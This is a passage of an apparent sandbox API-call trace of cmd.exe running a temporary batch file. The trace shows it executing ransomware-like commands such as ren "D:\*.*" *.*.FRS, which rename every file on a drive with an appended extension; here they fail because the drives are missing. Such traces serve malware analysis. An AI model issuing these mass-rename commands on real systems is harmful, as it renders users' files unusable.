_String2="DEL") returned 14 [0035.252] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.252] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.252] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.252] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.252] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.252] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.252] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.252] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.252] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.252] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.252] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.252] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.252] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.252] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.252] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.252] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.252] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.253] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.253] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xc8eb68, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xc8eb60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xc8eb60*=0xba2ee5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.253] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.253] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.253] GetFileAttributesW (lpFileName="C:\\*.*" (normalized: "c:\\*.*")) returned 0xffffffff [0035.253] GetLastError () returned 0x7b [0035.253] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd181d8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.253] SetErrorMode (uMode=0x0) returned 0x0 [0035.253] SetErrorMode (uMode=0x1) returned 0x0 [0035.253] GetFullPathNameW (in: lpFileName="C:\\*.*", nBufferLength=0x104, lpBuffer=0xc8e4f8, lpFilePart=0xc8e4cc | out: lpBuffer="C:\\*.*", lpFilePart=0xc8e4cc*="*.*") returned 0x6 [0035.253] SetErrorMode (uMode=0x0) returned 0x1 [0035.253] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0035.253] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.253] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.253] GetFileAttributesW (lpFileName="C:\\*.*" (normalized: "c:\\*.*")) returned 0xffffffff [0035.253] GetLastError () returned 0x7b [0035.253] FindFirstFileExW (in: lpFileName="C:\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17f78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17f78) returned 0xd18648 [0035.253] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 0 [0035.254] FindClose (in: hFindFile=0xd18648 | out: hFindFile=0xd18648) returned 1 [0035.254] GetLastError () returned 0x12 [0035.254] FindFirstFileExW (in: lpFileName="C:\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17f78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17f78) returned 0xd18648 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.254] FindClose (in: hFindFile=0xd18648 | out: hFindFile=0xd18648) returned 1 [0035.254] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.254] GetFileType (hFile=0x2c) returned 0x2 [0035.254] GetStdHandle (nStdHandle=0xfffffff4) returned 0x2c [0035.254] GetConsoleMode (in: hConsoleHandle=0x2c, lpMode=0xc8e674 | out: lpMode=0xc8e674) returned 1 [0035.255] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2c, lpConsoleScreenBufferInfo=0xc8e6c4 | out: lpConsoleScreenBufferInfo=0xc8e6c4) returned 1 [0035.255] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x232a, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The syntax of the command is incorrect.\r\n") returned 0x29 [0035.255] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x232a, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8e6f4 | out: lpBuffer="The syntax of the command is incorrect.\r\n") returned 0x29 [0035.255] WriteConsoleW (in: hConsoleOutput=0x2c, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0xc8e6a8, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8e6a8*=0x29) returned 1 [0035.255] longjmp () [0035.255] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.255] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.256] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.256] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.256] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.256] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.256] SetConsoleInputExeNameW () returned 0x1 [0035.256] GetConsoleOutputCP () returned 0x1b5 [0035.256] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.256] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.257] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.257] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.257] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.257] SetFilePointer (in: hFile=0x94, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0035.257] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.257] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0035.257] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x852, lpOverlapped=0x0) returned 1 [0035.257] SetFilePointer (in: hFile=0x94, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0035.257] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n\n\r\np.txt\"')do set n=%%i\r\n") returned 22 [0035.257] GetFileType (hFile=0x94) returned 0x1 [0035.257] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.257] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0035.257] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.258] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.258] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.258] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.258] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.258] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.258] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.258] _tell (_FileHandle=3) returned 562 [0035.258] _close (_FileHandle=3) returned 0 [0035.258] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.258] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.258] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.258] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.258] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.258] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.258] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.258] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.258] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.258] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.258] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.258] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.258] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.258] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.258] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.258] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.258] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.258] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.258] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.258] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0035.259] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.259] GetFileType (hFile=0x2c) returned 0x2 [0035.259] GetStdHandle (nStdHandle=0xfffffff4) returned 0x2c [0035.259] GetConsoleMode (in: hConsoleHandle=0x2c, lpMode=0xc8ecf4 | out: lpMode=0xc8ecf4) returned 1 [0035.259] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.259] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2c, lpConsoleScreenBufferInfo=0xc8ed44 | out: lpConsoleScreenBufferInfo=0xc8ed44) returned 1 [0035.259] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0xf, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the drive specified.\r\n") returned 0x2d [0035.260] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0xf, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed74 | out: lpBuffer="The system cannot find the drive specified.\r\n") returned 0x2d [0035.260] WriteConsoleW (in: hConsoleOutput=0x2c, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0xc8ed28, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ed28*=0x2d) returned 1 [0035.260] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.260] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.260] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.260] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.261] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.261] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.261] SetConsoleInputExeNameW () returned 0x1 [0035.261] GetConsoleOutputCP () returned 0x1b5 [0035.261] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.261] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.261] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.261] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.261] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.261] SetFilePointer (in: hFile=0x94, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0035.262] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.262] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0035.262] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x83c, lpOverlapped=0x0) returned 1 [0035.262] SetFilePointer (in: hFile=0x94, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0035.262] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n\n\r\np.txt\"')do set n=%%i\r\n") returned 22 [0035.262] GetFileType (hFile=0x94) returned 0x1 [0035.262] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.262] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0035.262] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.262] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.262] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.262] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.262] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.262] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.262] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.263] _tell (_FileHandle=3) returned 584 [0035.263] _close (_FileHandle=3) returned 0 [0035.263] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.263] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.263] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.263] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.263] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.263] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.263] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.263] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.263] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.263] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.263] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.263] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.263] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.263] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.263] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.263] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.263] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.263] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.263] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.263] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0035.264] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.264] GetFileType (hFile=0x2c) returned 0x2 [0035.264] GetStdHandle (nStdHandle=0xfffffff4) returned 0x2c [0035.264] GetConsoleMode (in: hConsoleHandle=0x2c, lpMode=0xc8ecf4 | out: lpMode=0xc8ecf4) returned 1 [0035.264] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.264] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2c, lpConsoleScreenBufferInfo=0xc8ed44 | out: lpConsoleScreenBufferInfo=0xc8ed44) returned 1 [0035.264] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0xf, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the drive specified.\r\n") returned 0x2d [0035.264] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0xf, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed74 | out: lpBuffer="The system cannot find the drive specified.\r\n") returned 0x2d [0035.264] WriteConsoleW (in: hConsoleOutput=0x2c, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0xc8ed28, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ed28*=0x2d) returned 1 [0035.264] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.265] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.265] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.265] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.265] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.265] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.265] SetConsoleInputExeNameW () returned 0x1 [0035.265] GetConsoleOutputCP () returned 0x1b5 [0035.265] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.265] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.266] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.266] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.266] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.266] SetFilePointer (in: hFile=0x94, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0035.266] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.266] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0035.266] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x826, lpOverlapped=0x0) returned 1 [0035.266] SetFilePointer (in: hFile=0x94, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0035.266] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n\n\r\np.txt\"')do set n=%%i\r\n") returned 22 [0035.266] GetFileType (hFile=0x94) returned 0x1 [0035.266] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.266] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0035.267] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.267] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.267] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.267] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.267] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.267] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.267] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.267] _tell (_FileHandle=3) returned 606 [0035.267] _close (_FileHandle=3) returned 0 [0035.267] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.267] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.267] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.267] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.267] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.267] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.267] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.267] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.267] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.267] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.267] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.267] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.267] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.268] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.268] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.268] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.268] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.268] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.268] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.268] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0035.268] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.268] GetFileType (hFile=0x2c) returned 0x2 [0035.268] GetStdHandle (nStdHandle=0xfffffff4) returned 0x2c [0035.268] GetConsoleMode (in: hConsoleHandle=0x2c, lpMode=0xc8ecf4 | out: lpMode=0xc8ecf4) returned 1 [0035.268] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.268] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2c, lpConsoleScreenBufferInfo=0xc8ed44 | out: lpConsoleScreenBufferInfo=0xc8ed44) returned 1 [0035.268] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0xf, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the drive specified.\r\n") returned 0x2d [0035.268] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0xf, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed74 | out: lpBuffer="The system cannot find the drive specified.\r\n") returned 0x2d [0035.268] WriteConsoleW (in: hConsoleOutput=0x2c, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0xc8ed28, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ed28*=0x2d) returned 1 [0035.269] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.269] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.269] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.269] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.269] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.269] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.269] SetConsoleInputExeNameW () returned 0x1 [0035.269] GetConsoleOutputCP () returned 0x1b5 [0035.270] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.270] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.270] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.270] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.270] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.270] SetFilePointer (in: hFile=0x94, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0035.270] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.270] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0035.270] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, 